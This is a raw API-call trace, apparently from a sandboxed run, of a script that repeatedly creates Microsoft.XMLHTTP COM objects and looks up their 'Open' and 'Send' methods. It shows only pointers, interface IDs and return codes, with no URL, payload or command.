	[0700.168] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0700.168] SysStringLen (param_1=0x0) returned 0x0
	[0700.168] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0700.168] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0700.168] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7450) returned 0x0
	[0700.168] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0700.169] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7558) returned 0x0
	[0700.169] ??2@YAPEAX_K@Z () returned 0x62f310
	[0700.169] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7558, pUnkSite=0x62f310) 
	[0700.169] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0700.169] XMLHTTPRequest:IUnknown:Release (This=0x49c7558) returned 0x0
	[0700.169] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7450) returned 0x0
	[0700.169] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7450) returned 0x3
	[0700.169] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0700.169] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7450, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0700.172] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0700.172] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0700.172] SysStringLen (param_1=0x0) returned 0x0
	[0700.172] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0700.172] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0700.172] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5b50) returned 0x0
	[0700.173] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0700.173] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c74b8) returned 0x0
	[0700.173] ??2@YAPEAX_K@Z () returned 0x62f330
	[0700.173] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c74b8, pUnkSite=0x62f330) 
	[0700.173] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0700.173] XMLHTTPRequest:IUnknown:Release (This=0x49c74b8) returned 0x0
	[0700.173] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5b50) returned 0x0
	[0700.174] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5b50) returned 0x3
	[0700.174] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0700.174] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5b50, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0700.174] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0700.174] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0700.174] SysStringLen (param_1=0x0) returned 0x0
	[0700.174] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0700.174] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0700.174] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7550) returned 0x0
	[0700.175] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0700.175] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7550, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5c88) returned 0x0
	[0700.175] ??2@YAPEAX_K@Z () returned 0x62f310
	[0700.175] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5c88, pUnkSite=0x62f310) 
	[0700.175] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0700.175] XMLHTTPRequest:IUnknown:Release (This=0x49c5c88) returned 0x0
	[0700.175] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7550, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7550) returned 0x0
	[0700.175] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7550) returned 0x3
	[0700.175] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7550, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0700.175] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7550, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0700.175] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7550, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0700.176] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0700.176] SysStringLen (param_1=0x0) returned 0x0
	[0700.176] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0700.176] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0700.176] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7450) returned 0x0
	[0700.176] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0700.176] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c74b8) returned 0x0
	[0700.176] ??2@YAPEAX_K@Z () returned 0x62f330
	[0700.176] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c74b8, pUnkSite=0x62f330) 
	[0700.176] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0700.176] XMLHTTPRequest:IUnknown:Release (This=0x49c74b8) returned 0x0
	[0700.176] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7450) returned 0x0
	[0700.176] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7450) returned 0x3
	[0700.177] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0700.177] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7450, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0700.177] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0700.177] longjmp () 
	[0700.177] longjmp () 
	[0700.177] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0700.177] SysStringLen (param_1=0x0) returned 0x0
	[0700.177] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0700.178] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0700.178] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5b50) returned 0x0
	[0700.178] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0700.178] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7878) returned 0x0
	[0700.178] ??2@YAPEAX_K@Z () returned 0x62f310
	[0700.178] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7878, pUnkSite=0x62f310) 
	[0700.178] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0700.178] XMLHTTPRequest:IUnknown:Release (This=0x49c7878) returned 0x0
	[0700.178] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5b50) returned 0x0
	[0700.178] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5b50) returned 0x3
	[0700.179] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0700.179] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5b50, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0700.179] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0700.179] longjmp () 
	[0700.179] longjmp () 
	[0700.179] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0700.179] SysStringLen (param_1=0x0) returned 0x0
	[0700.179] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0700.180] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0700.180] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c74b0) returned 0x0
	[0700.180] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0700.180] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7518) returned 0x0
	[0700.180] ??2@YAPEAX_K@Z () returned 0x62f330
	[0700.180] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7518, pUnkSite=0x62f330) 
	[0700.180] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0700.180] XMLHTTPRequest:IUnknown:Release (This=0x49c7518) returned 0x0
	[0700.180] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c74b0) returned 0x0
	[0700.180] XMLHTTPRequest:IUnknown:AddRef (This=0x49c74b0) returned 0x3
	[0700.180] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0700.180] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c74b0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0700.181] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0700.181] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0700.181] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c74b0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Send", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=5) returned 0x0
	[0700.181] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
